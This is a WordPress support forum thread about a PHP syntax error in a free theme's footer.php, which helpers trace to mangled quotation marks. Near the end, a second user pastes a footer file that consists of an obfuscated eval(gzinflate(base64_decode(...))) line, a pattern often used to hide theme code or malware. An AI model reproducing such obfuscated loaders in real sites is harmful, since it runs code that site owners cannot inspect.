• Resolved cutiesexpressions

    (@cutiesexpressions)


    Parse error: syntax error, unexpected T_STRING in /home2/idznvbv/public_html/wordpress/wp-content/themes/Sweet Daisy/footer.php on line 5

    i have an error please someone tell me what went wrong?

Viewing 11 replies - 16 through 26 (of 26 total)
  • creationrobot

    (@creationrobot)

    <div id=�footer�> should be <div id=”footer”>

    Only error I can see in your code is the quotes need replacing.

    Thread Starter cutiesexpressions

    (@cutiesexpressions)

    ok now my bottom half is bk but dang its side ways what happen
    heheheheehehehehe

    Thread Starter cutiesexpressions

    (@cutiesexpressions)

    i do thank you for helping me now we gotta fix me sideways bottom half lol

    creationrobot

    (@creationrobot)

    Well that is a theme problem as nathanrice said, the WordPress code is OK. So go back to where ever you downloaded the theme from and ask them for help with your theme, thanks.

    Thread Starter cutiesexpressions

    (@cutiesexpressions)

    i cant , so i am seeking it from here, it was a out of box theme and they dont do support

    Nathan Rice

    (@nathanrice)

    you can post your question here if the theme author doesn’t do support:
    http://wordpress.org/support/forum/5

    But like Creationrobot said, you have ? instead of quotes in part of your code. change that and see if it fixes it.

    Thread Starter cutiesexpressions

    (@cutiesexpressions)

    no it is still messed up now i took that ? out

    Thread Starter cutiesexpressions

    (@cutiesexpressions)

    where is the ? mark at u keep talking about in the coding

    creationrobot

    (@creationrobot)

    Please ask again on the Theme section of the WordPress site, http://wordpress.org/support/forum/5

    Your problem lies with a theme, not WordPress, and you’ll get a better response over there. Thanks.

    Thread Starter cutiesexpressions

    (@cutiesexpressions)

    i did thank you

    I also have a footer.php problem. I checked my site using the validator and I only have 3 errors left to fix, but they are in my footer I think. When I went into my footer.php this is what I see:

    <?php eval(gzinflate(base64_decode(‘bU89C8IwEN3zK45MujSDm6YpKA4iThUcpTVXU2hNSE5D++s11qk4Pd7dvY8rFJO6fUGrc95YS+i5YuXhVO6Pqx2cDfYI9QCyAuOxybkhcmshajuO+Biym+25+hEpKgVbb593Q/80McYsOkqWofGISSw4UEsd5vxivXYeQ5hCA1fzSfJnTIpPXTWHwhkH0V2nFxbLDRRpWVs9JDTUd+p7xOAN’)));?>

    However, in my errors for the validator it says: Line 499, Column 5: end tag for element “div” which is not open.
    </div>

    Line 499, Column 6: XML Parsing Error: Opening and ending tag mismatch: body line 51 and div.
    </div>

    Line 507, Column 7: XML Parsing Error: Opening and ending tag mismatch: html line 2 and body.
    </body>

    So yeah, I think it’s coming from my footer.php except when I go to it, it’s a bunch of letters and numbers. What do I do?

    My site’s here if you wanna check it out: http://www.ilovemoneymorethanyou.com

    Thanks

Viewing 11 replies - 16 through 26 (of 26 total)

The topic ‘footer.php error please help me’ is closed to new replies.